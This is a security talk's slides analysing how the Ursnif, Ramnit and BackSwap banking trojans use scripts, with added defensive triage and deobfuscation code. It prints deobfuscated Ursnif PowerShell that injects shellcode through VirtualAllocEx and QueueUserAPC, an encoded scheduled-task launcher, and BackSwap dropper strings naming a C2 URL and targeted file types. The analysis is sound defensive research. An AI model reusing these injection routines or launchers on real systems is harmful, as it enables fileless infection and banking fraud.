Revenge of The Script Kiddies
Uses of Automated Scripts by Top Banking Trojans
Agenda
● Financial Malware - Goals & Techniques
● Scripts in Today’s Banking Trojans
○ Ursnif (ISFB)
○ Ramnit
○ BackSwap
● Conclusions
Who We Are
Ophir Harpaz - Security Researcher @ Guardicore - @ophirharpaz - author of https://begin.re
Or Safran - Senior Security Researcher @ Proofpoint - @orsafr
Both formerly in Trusteer, IBM Security
Financial Malware - Concept
● Wait until an online banking session takes place
● Hijack the session
Note: target is the end user, not the bank!
Financial Malware - Goal
The Goal - Money
● In-Session
○ Wire transfer initiation
○ IBAN/Account # Swap
● Account Take-Over (ATO)
○ Browser Fingerprinting
○ RATs
Financial Malware - Flow
● Infect the machine
● Gain control over the browser
● Perform desired actions
○ Inject code, visual elements, communication functionality
○ Redirect user to a fake website
● Profit
Infection
Most popular method - spam emails with malicious attachments / links
Persistence
Startup folder, registry keys, task scheduler…
You know the gig
Control over the Browser
Usually done by code injection into the browser process & hooking of API functions
Attack
Web-Inject: Insert malicious code into the original webpage’s source
Redirect: Redirect the user to a fake website, tailor-made by the attacker
Web Injections
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top Banking Trojans" - Ophir Harpaz & Or Safran
Malware Configuration
The malware stores attacks in a configuration
Malware Configuration
Scripting in Today’s Bankers
Ursnif (Gozi, ISFB)
Background
● Well-known and widely-spread Banking Trojan
○ Source-code leaked
● To investigate its web-injects, we needed a way to infect machines
Infection Attempts (diagram): run the sample on a clean machine, and on a machine with the configuration
Our Goal - Infection
● We had:
○ Ursnif DLL
○ registry of infected machine
Infection fails - no web-injects in browser :(
Infection Script - Fool Ursnif
● Ursnif cares for SID (Security Identifier)
○ SID used as seed… ;)
● We wrote an infection script:
○ change the machine’s SID (SIDCHG)
○ “feed” the local registry
○ run the DLL
● ✅ Infected
Uh Oh...
● Ursnif decides to go “fileless” → No DLL - just registry
Fileless Executable
Raw Powershell
function bnfrytqqcw {
[System.Convert]::FromBase64String($args[0]);
};
[byte[]] $hyxyftq =
bnfrytqqcw("6SvaAACGBgCkqZBcAAAAAAAAAADwACIgCwIIAADaAAAALg...AAAA");
function yjklopnn {
$kkc = bnfrytqqcw($args[0]);
[System.Text.Encoding]::ASCII.GetString($kkc);
};
iex(yjklopnn("DQokdHhhdj0iW0RsbEltcG9ydChgImtlcm5lbDMy...7DQo="));
iex(yjklopnn("DQokdWdyYmQ9ImRrdGZmZW1wZyI7aWYoJHVzZWRm...9fQ0K"));
What We Know
✅ function toIntArray {
[System.Convert]::FromBase64String($args[0]);
};
[byte[]] $data =
toIntArray("6SvaAACGBgCkqZBcAAAAAAAAAADwACIgCwIIAADaAAAALg...AAAA");
✅ function toString {
$intArray = toIntArray($args[0]);
[System.Text.Encoding]::ASCII.GetString($intArray);
};
iex(toString("DQokdHhhdj0iW0RsbEltcG9ydChgImtlcm5lbDMy...7DQo="));
iex(toString("DQokdWdyYmQ9ImRrdGZmZW1wZyI7aWYoJHVzZWRm...9fQ0K"));
$data
[byte[]] $data =
toIntArray("6SvaAACGBgCkqZBcAAAAAAAAAADwACIgCwIIAADaAAAALg...AAAA");
… after Base64 decoding:
What We Know
✅ function toIntArray {
[System.Convert]::FromBase64String($args[0]);
};
✅ [byte[]] $payload =
toIntArray("6SvaAACGBgCkqZBcAAAAAAAAAADwACIgCwIIAADaAAAALg...AAAA");
✅ function toString {
$intArray = toIntArray($args[0]);
[System.Text.Encoding]::ASCII.GetString($intArray);
};
iex(toString("DQokdHhhdj0iW0RsbEltcG9ydChgImtlcm5lbDMy...7DQo="));
iex(toString("DQokdWdyYmQ9ImRrdGZmZW1wZyI7aWYoJHVzZWRm...9fQ0K"));
iex #1
iex(toString("DQokdHhhdj0iW0RsbEltcG9ydChgImtlcm5lbDMy...7DQo="));
iex #1
iex(“$txav="[DllImport(`"kernel32`")]`npublic static extern IntPtr GetCurrentThreadId();`n[DllImport(`"kernel32`")]`npublic static extern IntPtr OpenThread(uint mnnfsjxl,uint quq,IntPtr umtb);`n[DllImport(`"kernel32`")]`npublic static extern uint QueueUserAPC(IntPtr plvridkgu,IntPtr ire,IntPtr vvdbhcmmnva);`n[DllImport(`"kernel32`")]`npublic static extern void SleepEx(uint ahw,uint lus);";
$cfd=Add-Type -memberDefinition $txav -Name 'pptch' -namespace Win32Functions -passthru;
$pjovfxnn="unkua";
$vfyj="[DllImport(`"kernel32`")]`npublic static extern IntPtr GetCurrentProcess();`n[DllImport(`"kernel32`")]`npublic static extern IntPtr VirtualAllocEx(IntPtr xqfl,IntPtr jxmfwqfmtio,uint kkqvje,uint tuautkhbqn,uint hgbbpqulgva);";
$aholdl=Add-Type -memberDefinition $vfyj -Name 'robpgotb' -namespace Win32Functions -passthru;”));
iex #1
$txav = "[DllImport("kernel32")] public static extern IntPtr GetCurrentThreadId();
[DllImport("kernel32")] public static extern IntPtr OpenThread(uint mnnfsjxl,uint quq,IntPtr umtb);
[DllImport("kernel32")] public static extern uint QueueUserAPC(IntPtr plvridkgu,IntPtr ire,IntPtr vvdbhcmmnva);
[DllImport("kernel32")] public static extern void SleepEx(uint ahw,uint lus);";
$cfd = Add-Type -memberDefinition $txav -Name 'pptch' -namespace Win32Functions -passthru;
iex #1 - cont.
$vfyj = "[DllImport("kernel32")] public static extern IntPtr GetCurrentProcess();
[DllImport("kernel32")] public static extern IntPtr VirtualAllocEx(IntPtr xqfl,IntPtr jxmfwqfmtio,uint kkqvje,uint tuautkhbqn,uint hgbbpqulgva);";
$aholdl = Add-Type -memberDefinition $vfyj -Name 'robpgotb' -namespace Win32Functions -passthru;
What We Know
✅ function toIntArray {
[System.Convert]::FromBase64String($args[0]);
};
✅ [byte[]] $payload =
toIntArray("6SvaAACGBgCkqZBcAAAAAAAAAADwACIgCwIIAADaAAAALg...AAAA");
✅ function toString {
$intArray = toIntArray($args[0]);
[System.Text.Encoding]::ASCII.GetString($intArray);
};
✅ iex(toString("DQokdHhhdj0iW0RsbEltcG9ydChgImtlcm5lbDMy...7DQo="));
iex(toString("DQokdWdyYmQ9ImRrdGZmZW1wZyI7aWYoJHVzZWRm...9fQ0K"));
iex #2
iex(toString("DQokdWdyYmQ9ImRrdGZmZW1wZyI7aWYoJHVzZWRm...9fQ0K"));
iex #2
iex(“if($usedf=$aholdl::VirtualAllocEx($aholdl::GetCurrentProcess(),0,$hyxyftq.Length,12288,64)){
[System.Runtime.InteropServices.Marshal]::Copy($hyxyftq,0,$usedf,$hyxyftq.length);
if($cfd::QueueUserAPC($usedf,$cfd::OpenThread(16,0,$cfd::GetCurrentThreadId()),$usedf)){$cfd::SleepEx(3,1);}}”);
iex #2
if ($buffer = VirtualAllocEx(GetCurrentProcess(), 0, $payload.Length, 0x3000, 0x40)) {
    Copy($payload, 0, $buffer, $payload.length);
    if (QueueUserAPC($buffer, OpenThread(0x10, 0, GetCurrentThreadId()), $buffer)) {
        SleepEx(3, 1);
    }
}
PS Script - Summary
● Adds classes to the Powershell session to enable calling Windows API functions
● Allocates, writes and executes code in the memory of the current process’s address space
How Is This Executed?
Scheduled Task
forfiles /p C:\Windows\system32 /s /c "cmd /c @file -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwASQBkAGUAbgB0AGkAdABpAGUAcwBcAHsAMwA5AEUAQwAyAEUARQAxAC0ANgBGADIAMAAtAEUAMgBEADMALQA2AEMAQgA5AC0AMwBEADYAMgAxADQAQgAzAEEAOAA0ADEAfQAnACkALgBTAA==" /m p*ll.*e
Running The Script
Powershell.exe
"iex (gp 'HKCU:\Identities\<SID>').S"
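As an added example, not from the talk: a small Node triage script that does to the scheduled task above what an analyst does by hand. It pulls the -ec argument, decodes it from UTF-16LE base64 and matches the launcher and the decoded command against the indicators this deck walks through. The forfiles line is the deck's; the benign command and the stand-in for the registry-resident script are constructed, and the indicator names are mine.

```javascript
// Scheduled-task command line from the deck (backslashes restored). The
// base64 after -ec is a UTF-16LE encoded PowerShell command.
const URSNIF_TASK_CMD =
  'forfiles /p C:\\Windows\\system32 /s /c "cmd /c @file -ec ' +
  'aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwASQBkAGUAbgB0AGkAdABpAGUAcwBcAHsAMwA5AEUA' +
  'QwAyAEUARQAxAC0ANgBGADIAMAAtAEUAMgBEADMALQA2AEMAQgA5AC0AMwBEADYAMgAxADQAQgAzAEEA' +
  'OAA0ADEAfQAnACkALgBTAA==" /m p*ll.*e';

// Constructed benign counterpart: an admin running an encoded Get-Date.
const BENIGN_CMD = 'powershell.exe -NoProfile -ec ' +
  Buffer.from('Get-Date', 'utf16le').toString('base64');

// Constructed stand-in for the script body Ursnif keeps in the registry value
// that the decoded command reads; only the API names matter here.
const REGISTRY_SCRIPT_SAMPLE =
  '$p = [System.Convert]::FromBase64String($v); Add-Type -memberDefinition $d ' +
  '-Name t -namespace Win32Functions -passthru; $a::VirtualAllocEx(...); $c::QueueUserAPC(...)';

// powershell.exe accepts -EncodedCommand, any unambiguous prefix of it, and -ec.
// Returns the decoded command, or null when the line carries none.
function decodeEncodedCommand(cmdline) {
  const m = /-(e|ec|en[a-z]*)\s+([A-Za-z0-9+\/=]+)/i.exec(cmdline);
  if (!m) return null;
  const flag = m[1].toLowerCase();
  if (flag !== 'ec' && !'encodedcommand'.startsWith(flag)) return null;
  return Buffer.from(m[2], 'base64').toString('utf16le').replace(/\0+$/, '');
}

// Indicators taken from the techniques this deck walks through.
const LAUNCHER_INDICATORS = [
  // forfiles used to start a binary whose name is hidden behind a /m wildcard
  ['forfiles_wildcard_launcher', /\bforfiles\b[\s\S]*\/m\s+\S*\*\S*/i],
];
const SCRIPT_INDICATORS = [
  ['invoke_expression',     /\biex\b|invoke-expression/i],
  ['registry_payload_read', /\b(gp|get-itemproperty)\b[^;]*HK(CU|LM):/i],
  ['base64_decode',         /FromBase64String/i],
  ['win32_api_import',      /Add-Type[\s\S]*-memberDefinition|DllImport/i],
  ['memory_alloc_exec',     /VirtualAllocEx|QueueUserAPC/i],
];

function scan(text, table) {
  return table.filter(([, re]) => re.test(text)).map(([name]) => name);
}

// Triage one process command line: decode -ec if present, then match the
// launcher against the raw line and the script indicators against the
// decoded command (or the raw line when nothing was encoded).
function triageCommandLine(cmdline) {
  const decoded = decodeEncodedCommand(cmdline);
  const scriptText = decoded !== null ? decoded : cmdline;
  const indicators = [
    ...scan(cmdline, LAUNCHER_INDICATORS),
    ...scan(scriptText, SCRIPT_INDICATORS),
  ];
  return { decoded, indicators };
}

// Second stage: the registry-resident script the decoded command would iex.
function triageScriptBody(text) {
  return scan(text, SCRIPT_INDICATORS);
}

console.log(triageCommandLine(URSNIF_TASK_CMD));
console.log(triageCommandLine(BENIGN_CMD));
console.log(triageScriptBody(REGISTRY_SCRIPT_SAMPLE));
```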
Why Script?
● Fileless malware = stealthier malware
○ Evades AVs scanner modules
● Suspicious activity is done from within a “legitimate” process
Ramnit
Windows DPAPI (Data Protection API)
● Simple cryptographic API, since Windows 2000
● Enables symmetric encryption of any kind of data
● 2 different scopes (CurrentUser and LocalMachine)
● Sounds promising
DPAPI mostly sounds promising
● In the words of Benjamin Delpy: “Friends don't let friends save passwords with DPAPI; You know it's ~like cleartext passwords?”
● Many applications use it for legit reasons, e.g. Chrome
● Has a decryptor written by Nirsoft
mimikatz # coffee

    ( (
     ) )
  .______.
  |      |]
  \      /
   `----'
LOLBAS
● Living-Off-The-Land Binaries and Scripts (and also Libraries)
● Coined by Christopher Campbell & Matt Graeber
● Repo currently has 96 binaries
AMSI
Antimalware Scan Interface
● Part of Windows 10
● Interface standard that allows apps to integrate with antimalware products
● Bypassed a few times, by CyberArk using memory patching
Ramnit - Background
● Operating since 2010, taken down in 2015
● New versions released ~weekly
● Camellia - Latest known financial module
● 100K Machines in two months
● HVNC, keylogger, screenlog, cookie-grabber, form-grabber, MITB injections and more
It all starts with an “innocent looking” scheduled task
It’s well known that every randomly generated name in the scheduled task list is legit
Ramnit’s Folder
1. .vbs
2. .ps1
3. .txt
VBS
Microsoft, please...
Powershell
The .txt file...
… is exactly what you expect it to be - sh**
Decrypted .txt File
The Smoking Gun
# This is still GetProcAddress, but instead of PowerShell converting the string to a pointer, you must do it yourself
This doesn't look like “yourself”, or really bad opsec
Google yielded Invoke-ReflectivePEInjection.ps1
Ramnit vs. Github
Some Add-Ons
RuntimeCheck.dll
Decrypted & Deobfuscated
Architecture (diagram): Scheduled Task → runs → VB Script → runs → Powershell.exe → reads, decrypts and runs → .txt
Why Scripts?
● Multi-purpose
○ Decryption of .txt file
○ AMSI bypass
○ Code injection
● Ramnit’s Specialties
○ Multiple languages
○ Complex architecture
BackSwap (Ostap)
BackSwap
● First spotted in March 2018
● Polish targets → Spanish banks
● Simple yet pretty cool techniques for injection and credentials theft
BackSwap is COOL
● Greatly detailed by Michal Poslusny & Peter Kalnai and Itay Cohen
Once Upon a Time
● Fraud reported
● End-user shared the sample with us
● We got these:
This is not a sample.
● What is it?
● Quick-and-dirty static analysis
What are These?
● eight .jse files - JavaScript Encoded
● ScrDec to the rescue
Only 60k * 8 = 480,000 LoCs to read
Brief Look
Two unescape functions - called thousands of times
function Sdercfgvbhyj(d, f) {
    return unescape(d);
};
function Dertpolog(q, w, y) {
    return unescape(y);
};
Escape the unescape
Let’s accumulate their return values
accumulatedString = '';
function Sdercfgvbhyj(d, f) {
    accumulatedString += unescape(d);
    return unescape(d);
};
function Dertpolog(q, w, y) {
    accumulatedString += unescape(y);  // this wrapper forwards its third argument
    return unescape(y);
};
...
WScript.Echo(accumulatedString);
Escape the unescape
we got:
c:\Users\Elizabeth\Desktop>cscript cert.js
Microsoft (R) Windows Script Host Version 5.812
Copyright (C) Microsoft Corporation. All rights reserved.
EnumeratorActiveXObjectWScriptScriptFullNameGetObjectScripting.FileSystemObjectC
reateObjectWScript.ShellADODB.StreamShell.ApplicationMsxml2.ServerXMLHTTPfromCha
rCodeExpandEnvironmentStrings%USERPROFILE%fromCharCodefromCharCodeExpandEnvironm
entStrings%TEMP%floorrandomNameSpacecert.jse&pref=tysonhttps://185.209.160.50/ba
tya1/footer.php?oxx=fo10MZPOSTSelfPath2050000-f -decode 4294967295Drives*.doc
*.xls *.pdf *.rtf *.txt *.pub *.odt *.ods *.odp *.odm *.odc *.odb *.wps *.xlk
*.ppt *.pst *.dwg *.dxf *.dxg *.wpdLafamiliaestodo.txt
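The same strings can be recovered without running the dropper under cscript. As an added example that is not from the talk, this Node script scans the ScrDec-decoded source for calls to the two wrapper functions, takes the argument each one actually forwards to unescape (the first for Sdercfgvbhyj, the third for Dertpolog) and decodes it statically. The wrapper names are the deck's; the sample source and its encoded strings are constructed.

```javascript
// Constructed stand-in for a ScrDec-decoded .jse: the two wrapper names are the
// ones seen in the deck; the calls, decoy arguments and encoded strings are made up.
const DECODED_JSE_SAMPLE = `
function Sdercfgvbhyj(d, f) { return unescape(d); };
function Dertpolog(q, w, y) { return unescape(y); };
var o1 = Sdercfgvbhyj('%57%53%63%72%69%70%74', 'xk9');
var o2 = o1 + Dertpolog(12, 'zz', '%2E%53%68%65%6C%6C');
var o3 = Sdercfgvbhyj("%u0041%u0044%u004F%u0044%u0042", 4);
`;

// Which positional argument each wrapper forwards to unescape (read off the
// wrapper bodies): Sdercfgvbhyj -> arg 0, Dertpolog -> arg 2.
const WRAPPERS = { Sdercfgvbhyj: 0, Dertpolog: 2 };

// Split a call's argument text on top-level commas, honouring quoted strings.
function splitArgs(text) {
  const args = [];
  let cur = '', quote = null;
  for (let i = 0; i < text.length; i++) {
    const ch = text[i];
    if (quote) {
      cur += ch;
      if (ch === '\\') { cur += text[++i] || ''; continue; }  // keep escaped char
      if (ch === quote) quote = null;
    } else if (ch === '"' || ch === "'") {
      quote = ch; cur += ch;
    } else if (ch === ',') {
      args.push(cur.trim()); cur = '';
    } else {
      cur += ch;
    }
  }
  if (cur.trim() !== '') args.push(cur.trim());
  return args;
}

// Return the literal's contents if `arg` is a plain string literal, else null.
function stringLiteral(arg) {
  const m = /^(['"])(.*)\1$/s.exec(arg);
  return m ? m[2] : null;
}

// Find every wrapper call, decode the argument the wrapper forwards to
// unescape, and return the decoded strings in source order. Calls whose
// argument is not a literal (including the wrapper definitions) are skipped.
function recoverStrings(src, wrappers = WRAPPERS) {
  const found = [];
  for (const [name, argIndex] of Object.entries(wrappers)) {
    // Innermost calls only: the argument list may not itself contain parentheses.
    const re = new RegExp(`(?<![\\w$.])${name}\\s*\\(([^()]*)\\)`, 'g');
    for (const m of src.matchAll(re)) {
      const lit = stringLiteral(splitArgs(m[1])[argIndex] || '');
      if (lit === null) continue;
      found.push({ pos: m.index, text: unescape(lit) });
    }
  }
  return found.sort((a, b) => a.pos - b.pos).map(f => f.text);
}

const recovered = recoverStrings(DECODED_JSE_SAMPLE);
console.log(recovered);          // [ 'WScript', '.Shell', 'ADODB' ]
console.log(recovered.join('')); // what the deck's accumulatedString would hold
```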
Wrapping Up
● This is actually the BackSwap dropper, dubbed Ostap [1] or Nemucod
● BackSwap recently moved to Powershell instead of JSE [2]
[1] Ostap analysis by Cert.pl
[2] CheckPoint Research tweet
CONclusions
● Bankers tend to move functionality from binaries to scripts
○ Infection (download)
○ Execution
○ Encryption
● Why?
○ AV evasion
○ Laziness
○ It works
We’re done.
Questions?
@OphirHarpaz
@OrSafr
IOCs
Ursnif 4265E7A393B96AE4E7302541419CA0A5
Ramnit B23F633D0A64E2E44E546558C9C42C8F
Backswap 0A5D0AAD2A352B047DABECE87DCAF5D2
